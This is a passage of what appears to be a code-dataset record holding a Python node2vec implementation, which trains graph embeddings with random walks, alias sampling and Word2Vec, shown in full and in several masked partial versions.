alias_edges def alias_setup(probs): K = len(probs) q = np.zeros(K) J = np.zeros(K, dtype=np.int) smaller = [] larger = [] for kk, prob in enumerate(probs): q[kk] = K * prob if q[kk] > 1.0: larger.append(kk) else: smaller.append(kk) while len(smaller) > 0 and len(larger) > 0: small = smaller.pop() large = larger.pop() J[small] = large q[large] = q[small] + q[large] - 1 if q[large] < 1.0: smaller.append(large) else: larger.append(large) return J, q def alias_draw(J, q): K = len(J) kk = int(np.floor(np.random.rand() * K)) if np.random.rand() < q[kk]: return kk else: return J[kk] def parse_args(): parser = argparse.ArgumentParser(description='Run node2vec.') parser.add_argument('--input', nargs='?', 
default= './data/Wiki_edgelist.txt', help='Input graph path') parser.add_argument('--output', nargs='?', default= 'emb/node2vec_wiki.emb', help='Embeddings path') parser.add_argument('--label_file', nargs='?', default= 'data/wiki_labels.txt', help='Labels path') parser.add_argument('--dimensions', type=int, default=128, help= 'Number of dimensions. Default is 128.') parser.add_argument('--walk-length', type=int, default=80, help= 'Length of walk per source. Default is 80.') parser.add_argument('--num-walks', type=int, default=20, help= 'Number of walks per source. Default is 10.') parser.add_argument('--window-size', type=int, default=10, help= 'Context size for optimization. Default is 10.') parser.add_argument('--iter', default=2, type=int, help= 'Number of epochs in SGD') parser.add_argument('--workers', type=int, default=8, help= 'Number of parallel workers. Default is 8.') parser.add_argument('--p', type=float, default=1, help= 'Return hyperparameter. Default is 1.') parser.add_argument('--q', type=float, default=1, help= 'Inout hyperparameter. Default is 1.') parser.add_argument('--weighted', dest='weighted', action='store_true', help='Boolean specifying (un)weighted. Default is unweighted.') parser.add_argument('--unweighted', dest='unweighted', action='store_false' ) parser.set_defaults(weighted=False) parser.add_argument('--directed', dest='directed', action='store_true', help='Graph is (un)directed. Default is undirected.') parser.add_argument('--undirected', dest='undirected', action='store_false' ) parser.set_defaults(directed=False) return parser.parse_args() def read_graph(): if args.weighted: G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float),), create_using=nx.DiGraph) else: G = nx.read_edgelist(args.input, nodetype=int, create_using=nx. 
DiGraph()) for edge in G.edges(): G[edge[0]][edge[1]]['weight'] = 1 if not args.directed: G = G.to_undirected() return G def learning_walks(walks): walks = [list(map(str, walk)) for walk in walks] model = Word2Vec(walks, size=args.dimensions, window=args.window_size, min_count=0, sg=1, workers=args.workers, iter=args.iter) model.wv.save_word2vec_format(args.output) return model def main(args): nx_G = read_graph() G = node2vec_walk(nx_G, args.directed, args.p, args.q) G.preprocess_transition_probs() walks = G.simulate_walks(args.num_walks, args.walk_length) model = learning_walks(walks) _embeddings = {} for v in nx_G.nodes(): _embeddings[str(v)] = model.wv[str(v)] plot_embeddings(_embeddings, args.label_file) if __name__ == '__main__': args = parse_args() main(args) <|reserved_special_token_1|> import numpy as np import random import argparse import networkx as nx from gensim.models import Word2Vec from utils import read_node_label, plot_embeddings class node2vec_walk(): def __init__(self, nx_G, is_directed, p, q): self.G = nx_G self.is_directed = is_directed self.p = p self.q = q def node2vec_walk(self, walk_length, start_node): G = self.G alias_nodes = self.alias_nodes alias_edges = self.alias_edges walk = [start_node] while len(walk) < walk_length: curr = walk[-1] cur_nbrs = sorted(G.neighbors(curr)) if len(cur_nbrs) > 0: if len(walk) == 1: walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])]) else: prev = walk[-2] next = cur_nbrs[alias_draw(alias_edges[(prev, curr)][0], alias_edges[(prev, curr)][1])] walk.append(next) else: break return walk def simulate_walks(self, num_walks, walk_length): G = self.G walks = [] nodes = list(G.nodes()) print("Walk iteration...") for walk_iter in range(num_walks): print(f"{walk_iter + 1}/{num_walks}") random.shuffle(nodes) for node in nodes: walks.append(self.node2vec_walk(walk_length, node)) return walks def get_alias_edge(self, src, dst): G = self.G p = self.p q = self.q unnormalized_probs = [] for 
dst_nbr in sorted(G.neighbors(dst)): if dst_nbr == src: unnormalized_probs.append(G[dst][dst_nbr]["weight"] / p) elif G.has_edge(dst_nbr, src): unnormalized_probs.append(G[dst][dst_nbr]["weight"]) else: unnormalized_probs.append(G[dst][dst_nbr]["weight"] / q) norm_cost = sum(unnormalized_probs) normalized_probs = [float(v) / norm_cost for v in unnormalized_probs] return alias_setup(normalized_probs) def preprocess_transition_probs(self): # 预处理转移概率 G = self.G is_directed = self.is_directed alias_nodes = {} for node in G.nodes(): unnormalized_probs = [G[node][nbr]["weight"] for nbr in sorted(G.neighbors(node))] norm_const = sum(unnormalized_probs) normalized_probs = [float(v) / norm_const for v in unnormalized_probs] alias_nodes[node] = alias_setup(normalized_probs) alias_edges = {} if is_directed: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) else: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) alias_edges[(edge[1], edge[0])] = self.get_alias_edge(edge[1], edge[0]) self.alias_nodes = alias_nodes self.alias_edges = alias_edges def alias_setup(probs): K = len(probs) q = np.zeros(K) J = np.zeros(K, dtype=np.int) smaller = [] larger = [] for kk, prob in enumerate(probs): q[kk] = K * prob # 记录小于均匀分布概率的Index if q[kk] > 1.0: larger.append(kk) else: smaller.append(kk) while len(smaller) > 0 and len(larger) > 0: small = smaller.pop() large = larger.pop() # 记录index J[small] = large # 将small的补充满1后,算出剩余large的概率 q[large] = q[small] + q[large] - 1 # 若q[large]不等于1,则继续放入smaller和larger的数组中进行迭代 if q[large] < 1.0: smaller.append(large) else: larger.append(large) return J, q def alias_draw(J, q): # 非均匀分布进行采样 K = len(J) kk = int(np.floor(np.random.rand() * K)) if np.random.rand() < q[kk]: return kk else: return J[kk] def parse_args(): parser = argparse.ArgumentParser(description="Run node2vec.") parser.add_argument('--input', nargs='?', default='./data/Wiki_edgelist.txt', help='Input graph path') 
parser.add_argument('--output', nargs='?', default='emb/node2vec_wiki.emb', help='Embeddings path') parser.add_argument('--label_file', nargs='?', default='data/wiki_labels.txt', help='Labels path') parser.add_argument('--dimensions', type=int, default=128, help='Number of dimensions. Default is 128.') parser.add_argument('--walk-length', type=int, default=80, help='Length of walk per source. Default is 80.') parser.add_argument('--num-walks', type=int, default=20, help='Number of walks per source. Default is 10.') parser.add_argument('--window-size', type=int, default=10, help='Context size for optimization. Default is 10.') parser.add_argument('--iter', default=2, type=int, help='Number of epochs in SGD') parser.add_argument('--workers', type=int, default=8, help='Number of parallel workers. Default is 8.') parser.add_argument('--p', type=float, default=1, help='Return hyperparameter. Default is 1.') parser.add_argument('--q', type=float, default=1, help='Inout hyperparameter. Default is 1.') parser.add_argument('--weighted', dest='weighted', action='store_true', help='Boolean specifying (un)weighted. Default is unweighted.') parser.add_argument('--unweighted', dest='unweighted', action='store_false') parser.set_defaults(weighted=False) parser.add_argument('--directed', dest='directed', action='store_true', help='Graph is (un)directed. 
Default is undirected.') parser.add_argument('--undirected', dest='undirected', action='store_false') parser.set_defaults(directed=False) return parser.parse_args() def read_graph(): if args.weighted: G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float), ), create_using=nx.DiGraph) else: G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.DiGraph()) for edge in G.edges(): G[edge[0]][edge[1]]['weight'] = 1 if not args.directed: G = G.to_undirected() return G def learning_walks(walks): walks = [list(map(str, walk)) for walk in walks] model = Word2Vec(walks, size=args.dimensions, window=args.window_size, min_count=0, sg=1, workers=args.workers, iter=args.iter) model.wv.save_word2vec_format(args.output) return model def main(args): nx_G = read_graph() G = node2vec_walk(nx_G, args.directed, args.p, args.q) G.preprocess_transition_probs() walks = G.simulate_walks(args.num_walks, args.walk_length) model = learning_walks(walks) _embeddings = {} for v in nx_G.nodes(): _embeddings[str(v)] = model.wv[str(v)] plot_embeddings(_embeddings, args.label_file) if __name__ == "__main__": args = parse_args() main(args)
flexible
{ "blob_id": "fc2748d766ebce8c9577f1eebc8435e2aa58ae25", "index": 8605, "step-1": "<mask token>\n\n\nclass node2vec_walk:\n\n def __init__(self, nx_G, is_directed, p, q):\n self.G = nx_G\n self.is_directed = is_directed\n self.p = p\n self.q = q\n\n def node2vec_walk(self, walk_length, start_node):\n G = self.G\n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n walk = [start_node]\n while len(walk) < walk_length:\n curr = walk[-1]\n cur_nbrs = sorted(G.neighbors(curr))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0],\n alias_nodes[curr][1])])\n else:\n prev = walk[-2]\n next = cur_nbrs[alias_draw(alias_edges[prev, curr][0],\n alias_edges[prev, curr][1])]\n walk.append(next)\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n G = self.G\n walks = []\n nodes = list(G.nodes())\n print('Walk iteration...')\n for walk_iter in range(num_walks):\n print(f'{walk_iter + 1}/{num_walks}')\n random.shuffle(nodes)\n for node in nodes:\n walks.append(self.node2vec_walk(walk_length, node))\n return walks\n\n def get_alias_edge(self, src, dst):\n G = self.G\n p = self.p\n q = self.q\n unnormalized_probs = []\n for dst_nbr in sorted(G.neighbors(dst)):\n if dst_nbr == src:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p)\n elif G.has_edge(dst_nbr, src):\n unnormalized_probs.append(G[dst][dst_nbr]['weight'])\n else:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q)\n norm_cost = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs]\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n G = self.G\n is_directed = self.is_directed\n alias_nodes = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted(\n G.neighbors(node))]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_const) for v in\n unnormalized_probs]\n alias_nodes[node] 
= alias_setup(normalized_probs)\n alias_edges = {}\n if is_directed:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n else:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1],\n edge[0])\n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n\n\n<mask token>\n\n\ndef read_graph():\n if args.weighted:\n G = nx.read_edgelist(args.input, nodetype=int, data=(('weight',\n float),), create_using=nx.DiGraph)\n else:\n G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.\n DiGraph())\n for edge in G.edges():\n G[edge[0]][edge[1]]['weight'] = 1\n if not args.directed:\n G = G.to_undirected()\n return G\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass node2vec_walk:\n\n def __init__(self, nx_G, is_directed, p, q):\n self.G = nx_G\n self.is_directed = is_directed\n self.p = p\n self.q = q\n\n def node2vec_walk(self, walk_length, start_node):\n G = self.G\n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n walk = [start_node]\n while len(walk) < walk_length:\n curr = walk[-1]\n cur_nbrs = sorted(G.neighbors(curr))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0],\n alias_nodes[curr][1])])\n else:\n prev = walk[-2]\n next = cur_nbrs[alias_draw(alias_edges[prev, curr][0],\n alias_edges[prev, curr][1])]\n walk.append(next)\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n G = self.G\n walks = []\n nodes = list(G.nodes())\n print('Walk iteration...')\n for walk_iter in range(num_walks):\n print(f'{walk_iter + 1}/{num_walks}')\n random.shuffle(nodes)\n for node in nodes:\n walks.append(self.node2vec_walk(walk_length, node))\n return walks\n\n def get_alias_edge(self, src, dst):\n G = self.G\n p = self.p\n q = self.q\n unnormalized_probs = []\n for dst_nbr in sorted(G.neighbors(dst)):\n if dst_nbr == src:\n 
unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p)\n elif G.has_edge(dst_nbr, src):\n unnormalized_probs.append(G[dst][dst_nbr]['weight'])\n else:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q)\n norm_cost = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs]\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n G = self.G\n is_directed = self.is_directed\n alias_nodes = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted(\n G.neighbors(node))]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_const) for v in\n unnormalized_probs]\n alias_nodes[node] = alias_setup(normalized_probs)\n alias_edges = {}\n if is_directed:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n else:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1],\n edge[0])\n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n\n\n<mask token>\n\n\ndef read_graph():\n if args.weighted:\n G = nx.read_edgelist(args.input, nodetype=int, data=(('weight',\n float),), create_using=nx.DiGraph)\n else:\n G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.\n DiGraph())\n for edge in G.edges():\n G[edge[0]][edge[1]]['weight'] = 1\n if not args.directed:\n G = G.to_undirected()\n return G\n\n\n<mask token>\n\n\ndef main(args):\n nx_G = read_graph()\n G = node2vec_walk(nx_G, args.directed, args.p, args.q)\n G.preprocess_transition_probs()\n walks = G.simulate_walks(args.num_walks, args.walk_length)\n model = learning_walks(walks)\n _embeddings = {}\n for v in nx_G.nodes():\n _embeddings[str(v)] = model.wv[str(v)]\n plot_embeddings(_embeddings, args.label_file)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass node2vec_walk:\n\n def __init__(self, nx_G, is_directed, p, q):\n self.G = nx_G\n 
self.is_directed = is_directed\n self.p = p\n self.q = q\n\n def node2vec_walk(self, walk_length, start_node):\n G = self.G\n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n walk = [start_node]\n while len(walk) < walk_length:\n curr = walk[-1]\n cur_nbrs = sorted(G.neighbors(curr))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0],\n alias_nodes[curr][1])])\n else:\n prev = walk[-2]\n next = cur_nbrs[alias_draw(alias_edges[prev, curr][0],\n alias_edges[prev, curr][1])]\n walk.append(next)\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n G = self.G\n walks = []\n nodes = list(G.nodes())\n print('Walk iteration...')\n for walk_iter in range(num_walks):\n print(f'{walk_iter + 1}/{num_walks}')\n random.shuffle(nodes)\n for node in nodes:\n walks.append(self.node2vec_walk(walk_length, node))\n return walks\n\n def get_alias_edge(self, src, dst):\n G = self.G\n p = self.p\n q = self.q\n unnormalized_probs = []\n for dst_nbr in sorted(G.neighbors(dst)):\n if dst_nbr == src:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p)\n elif G.has_edge(dst_nbr, src):\n unnormalized_probs.append(G[dst][dst_nbr]['weight'])\n else:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q)\n norm_cost = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs]\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n G = self.G\n is_directed = self.is_directed\n alias_nodes = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted(\n G.neighbors(node))]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_const) for v in\n unnormalized_probs]\n alias_nodes[node] = alias_setup(normalized_probs)\n alias_edges = {}\n if is_directed:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n else:\n for edge in G.edges():\n 
alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1],\n edge[0])\n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n\n\ndef alias_setup(probs):\n K = len(probs)\n q = np.zeros(K)\n J = np.zeros(K, dtype=np.int)\n smaller = []\n larger = []\n for kk, prob in enumerate(probs):\n q[kk] = K * prob\n if q[kk] > 1.0:\n larger.append(kk)\n else:\n smaller.append(kk)\n while len(smaller) > 0 and len(larger) > 0:\n small = smaller.pop()\n large = larger.pop()\n J[small] = large\n q[large] = q[small] + q[large] - 1\n if q[large] < 1.0:\n smaller.append(large)\n else:\n larger.append(large)\n return J, q\n\n\ndef alias_draw(J, q):\n K = len(J)\n kk = int(np.floor(np.random.rand() * K))\n if np.random.rand() < q[kk]:\n return kk\n else:\n return J[kk]\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Run node2vec.')\n parser.add_argument('--input', nargs='?', default=\n './data/Wiki_edgelist.txt', help='Input graph path')\n parser.add_argument('--output', nargs='?', default=\n 'emb/node2vec_wiki.emb', help='Embeddings path')\n parser.add_argument('--label_file', nargs='?', default=\n 'data/wiki_labels.txt', help='Labels path')\n parser.add_argument('--dimensions', type=int, default=128, help=\n 'Number of dimensions. Default is 128.')\n parser.add_argument('--walk-length', type=int, default=80, help=\n 'Length of walk per source. Default is 80.')\n parser.add_argument('--num-walks', type=int, default=20, help=\n 'Number of walks per source. Default is 10.')\n parser.add_argument('--window-size', type=int, default=10, help=\n 'Context size for optimization. Default is 10.')\n parser.add_argument('--iter', default=2, type=int, help=\n 'Number of epochs in SGD')\n parser.add_argument('--workers', type=int, default=8, help=\n 'Number of parallel workers. Default is 8.')\n parser.add_argument('--p', type=float, default=1, help=\n 'Return hyperparameter. 
Default is 1.')\n parser.add_argument('--q', type=float, default=1, help=\n 'Inout hyperparameter. Default is 1.')\n parser.add_argument('--weighted', dest='weighted', action='store_true',\n help='Boolean specifying (un)weighted. Default is unweighted.')\n parser.add_argument('--unweighted', dest='unweighted', action='store_false'\n )\n parser.set_defaults(weighted=False)\n parser.add_argument('--directed', dest='directed', action='store_true',\n help='Graph is (un)directed. Default is undirected.')\n parser.add_argument('--undirected', dest='undirected', action='store_false'\n )\n parser.set_defaults(directed=False)\n return parser.parse_args()\n\n\ndef read_graph():\n if args.weighted:\n G = nx.read_edgelist(args.input, nodetype=int, data=(('weight',\n float),), create_using=nx.DiGraph)\n else:\n G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.\n DiGraph())\n for edge in G.edges():\n G[edge[0]][edge[1]]['weight'] = 1\n if not args.directed:\n G = G.to_undirected()\n return G\n\n\ndef learning_walks(walks):\n walks = [list(map(str, walk)) for walk in walks]\n model = Word2Vec(walks, size=args.dimensions, window=args.window_size,\n min_count=0, sg=1, workers=args.workers, iter=args.iter)\n model.wv.save_word2vec_format(args.output)\n return model\n\n\ndef main(args):\n nx_G = read_graph()\n G = node2vec_walk(nx_G, args.directed, args.p, args.q)\n G.preprocess_transition_probs()\n walks = G.simulate_walks(args.num_walks, args.walk_length)\n model = learning_walks(walks)\n _embeddings = {}\n for v in nx_G.nodes():\n _embeddings[str(v)] = model.wv[str(v)]\n plot_embeddings(_embeddings, args.label_file)\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass node2vec_walk:\n\n def __init__(self, nx_G, is_directed, p, q):\n self.G = nx_G\n self.is_directed = is_directed\n self.p = p\n self.q = q\n\n def node2vec_walk(self, walk_length, start_node):\n G = self.G\n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n walk = [start_node]\n 
while len(walk) < walk_length:\n curr = walk[-1]\n cur_nbrs = sorted(G.neighbors(curr))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0],\n alias_nodes[curr][1])])\n else:\n prev = walk[-2]\n next = cur_nbrs[alias_draw(alias_edges[prev, curr][0],\n alias_edges[prev, curr][1])]\n walk.append(next)\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n G = self.G\n walks = []\n nodes = list(G.nodes())\n print('Walk iteration...')\n for walk_iter in range(num_walks):\n print(f'{walk_iter + 1}/{num_walks}')\n random.shuffle(nodes)\n for node in nodes:\n walks.append(self.node2vec_walk(walk_length, node))\n return walks\n\n def get_alias_edge(self, src, dst):\n G = self.G\n p = self.p\n q = self.q\n unnormalized_probs = []\n for dst_nbr in sorted(G.neighbors(dst)):\n if dst_nbr == src:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p)\n elif G.has_edge(dst_nbr, src):\n unnormalized_probs.append(G[dst][dst_nbr]['weight'])\n else:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q)\n norm_cost = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs]\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n G = self.G\n is_directed = self.is_directed\n alias_nodes = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted(\n G.neighbors(node))]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_const) for v in\n unnormalized_probs]\n alias_nodes[node] = alias_setup(normalized_probs)\n alias_edges = {}\n if is_directed:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n else:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1],\n edge[0])\n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n\n\ndef 
alias_setup(probs):\n K = len(probs)\n q = np.zeros(K)\n J = np.zeros(K, dtype=np.int)\n smaller = []\n larger = []\n for kk, prob in enumerate(probs):\n q[kk] = K * prob\n if q[kk] > 1.0:\n larger.append(kk)\n else:\n smaller.append(kk)\n while len(smaller) > 0 and len(larger) > 0:\n small = smaller.pop()\n large = larger.pop()\n J[small] = large\n q[large] = q[small] + q[large] - 1\n if q[large] < 1.0:\n smaller.append(large)\n else:\n larger.append(large)\n return J, q\n\n\ndef alias_draw(J, q):\n K = len(J)\n kk = int(np.floor(np.random.rand() * K))\n if np.random.rand() < q[kk]:\n return kk\n else:\n return J[kk]\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Run node2vec.')\n parser.add_argument('--input', nargs='?', default=\n './data/Wiki_edgelist.txt', help='Input graph path')\n parser.add_argument('--output', nargs='?', default=\n 'emb/node2vec_wiki.emb', help='Embeddings path')\n parser.add_argument('--label_file', nargs='?', default=\n 'data/wiki_labels.txt', help='Labels path')\n parser.add_argument('--dimensions', type=int, default=128, help=\n 'Number of dimensions. Default is 128.')\n parser.add_argument('--walk-length', type=int, default=80, help=\n 'Length of walk per source. Default is 80.')\n parser.add_argument('--num-walks', type=int, default=20, help=\n 'Number of walks per source. Default is 10.')\n parser.add_argument('--window-size', type=int, default=10, help=\n 'Context size for optimization. Default is 10.')\n parser.add_argument('--iter', default=2, type=int, help=\n 'Number of epochs in SGD')\n parser.add_argument('--workers', type=int, default=8, help=\n 'Number of parallel workers. Default is 8.')\n parser.add_argument('--p', type=float, default=1, help=\n 'Return hyperparameter. Default is 1.')\n parser.add_argument('--q', type=float, default=1, help=\n 'Inout hyperparameter. Default is 1.')\n parser.add_argument('--weighted', dest='weighted', action='store_true',\n help='Boolean specifying (un)weighted. 
Default is unweighted.')\n parser.add_argument('--unweighted', dest='unweighted', action='store_false'\n )\n parser.set_defaults(weighted=False)\n parser.add_argument('--directed', dest='directed', action='store_true',\n help='Graph is (un)directed. Default is undirected.')\n parser.add_argument('--undirected', dest='undirected', action='store_false'\n )\n parser.set_defaults(directed=False)\n return parser.parse_args()\n\n\ndef read_graph():\n if args.weighted:\n G = nx.read_edgelist(args.input, nodetype=int, data=(('weight',\n float),), create_using=nx.DiGraph)\n else:\n G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.\n DiGraph())\n for edge in G.edges():\n G[edge[0]][edge[1]]['weight'] = 1\n if not args.directed:\n G = G.to_undirected()\n return G\n\n\ndef learning_walks(walks):\n walks = [list(map(str, walk)) for walk in walks]\n model = Word2Vec(walks, size=args.dimensions, window=args.window_size,\n min_count=0, sg=1, workers=args.workers, iter=args.iter)\n model.wv.save_word2vec_format(args.output)\n return model\n\n\ndef main(args):\n nx_G = read_graph()\n G = node2vec_walk(nx_G, args.directed, args.p, args.q)\n G.preprocess_transition_probs()\n walks = G.simulate_walks(args.num_walks, args.walk_length)\n model = learning_walks(walks)\n _embeddings = {}\n for v in nx_G.nodes():\n _embeddings[str(v)] = model.wv[str(v)]\n plot_embeddings(_embeddings, args.label_file)\n\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n", "step-5": "\n\nimport numpy as np\nimport random\n\nimport argparse\nimport networkx as nx\nfrom gensim.models import Word2Vec\n\nfrom utils import read_node_label, plot_embeddings\n\nclass node2vec_walk():\n\n def __init__(self, nx_G, is_directed, p, q):\n self.G = nx_G\n self.is_directed = is_directed\n self.p = p\n self.q = q\n\n def node2vec_walk(self, walk_length, start_node):\n G = self.G\n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n\n walk = [start_node]\n\n while len(walk) < 
walk_length:\n curr = walk[-1]\n cur_nbrs = sorted(G.neighbors(curr))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])])\n else:\n prev = walk[-2]\n next = cur_nbrs[alias_draw(alias_edges[(prev, curr)][0], alias_edges[(prev, curr)][1])]\n walk.append(next)\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n G = self.G\n walks = []\n nodes = list(G.nodes())\n\n print(\"Walk iteration...\")\n\n for walk_iter in range(num_walks):\n print(f\"{walk_iter + 1}/{num_walks}\")\n random.shuffle(nodes)\n for node in nodes:\n walks.append(self.node2vec_walk(walk_length, node))\n return walks\n\n def get_alias_edge(self, src, dst):\n G = self.G\n p = self.p\n q = self.q\n unnormalized_probs = []\n for dst_nbr in sorted(G.neighbors(dst)):\n if dst_nbr == src:\n unnormalized_probs.append(G[dst][dst_nbr][\"weight\"] / p)\n elif G.has_edge(dst_nbr, src):\n unnormalized_probs.append(G[dst][dst_nbr][\"weight\"])\n else:\n unnormalized_probs.append(G[dst][dst_nbr][\"weight\"] / q)\n norm_cost = sum(unnormalized_probs)\n normalized_probs = [float(v) / norm_cost for v in unnormalized_probs]\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n # 预处理转移概率\n G = self.G\n is_directed = self.is_directed\n\n alias_nodes = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbr][\"weight\"] for nbr in sorted(G.neighbors(node))]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [float(v) / norm_const for v in unnormalized_probs]\n alias_nodes[node] = alias_setup(normalized_probs)\n\n alias_edges = {}\n\n if is_directed:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n else:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n alias_edges[(edge[1], edge[0])] = self.get_alias_edge(edge[1], edge[0])\n\n\n self.alias_nodes = alias_nodes\n self.alias_edges = 
alias_edges\n\n\n\ndef alias_setup(probs):\n K = len(probs)\n q = np.zeros(K)\n J = np.zeros(K, dtype=np.int)\n\n smaller = []\n larger = []\n for kk, prob in enumerate(probs):\n q[kk] = K * prob\n # 记录小于均匀分布概率的Index\n if q[kk] > 1.0:\n larger.append(kk)\n else:\n smaller.append(kk)\n\n while len(smaller) > 0 and len(larger) > 0:\n small = smaller.pop()\n large = larger.pop()\n\n # 记录index\n J[small] = large\n # 将small的补充满1后,算出剩余large的概率\n q[large] = q[small] + q[large] - 1\n # 若q[large]不等于1,则继续放入smaller和larger的数组中进行迭代\n if q[large] < 1.0:\n smaller.append(large)\n else:\n larger.append(large)\n\n return J, q\n\ndef alias_draw(J, q):\n # 非均匀分布进行采样\n K = len(J)\n\n kk = int(np.floor(np.random.rand() * K))\n if np.random.rand() < q[kk]:\n return kk\n else:\n return J[kk]\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Run node2vec.\")\n parser.add_argument('--input', nargs='?', default='./data/Wiki_edgelist.txt', help='Input graph path')\n parser.add_argument('--output', nargs='?', default='emb/node2vec_wiki.emb', help='Embeddings path')\n parser.add_argument('--label_file', nargs='?', default='data/wiki_labels.txt', help='Labels path')\n parser.add_argument('--dimensions', type=int, default=128, help='Number of dimensions. Default is 128.')\n parser.add_argument('--walk-length', type=int, default=80, help='Length of walk per source. Default is 80.')\n parser.add_argument('--num-walks', type=int, default=20, help='Number of walks per source. Default is 10.')\n parser.add_argument('--window-size', type=int, default=10, help='Context size for optimization. Default is 10.')\n parser.add_argument('--iter', default=2, type=int, help='Number of epochs in SGD')\n parser.add_argument('--workers', type=int, default=8, help='Number of parallel workers. Default is 8.')\n parser.add_argument('--p', type=float, default=1, help='Return hyperparameter. Default is 1.')\n parser.add_argument('--q', type=float, default=1, help='Inout hyperparameter. 
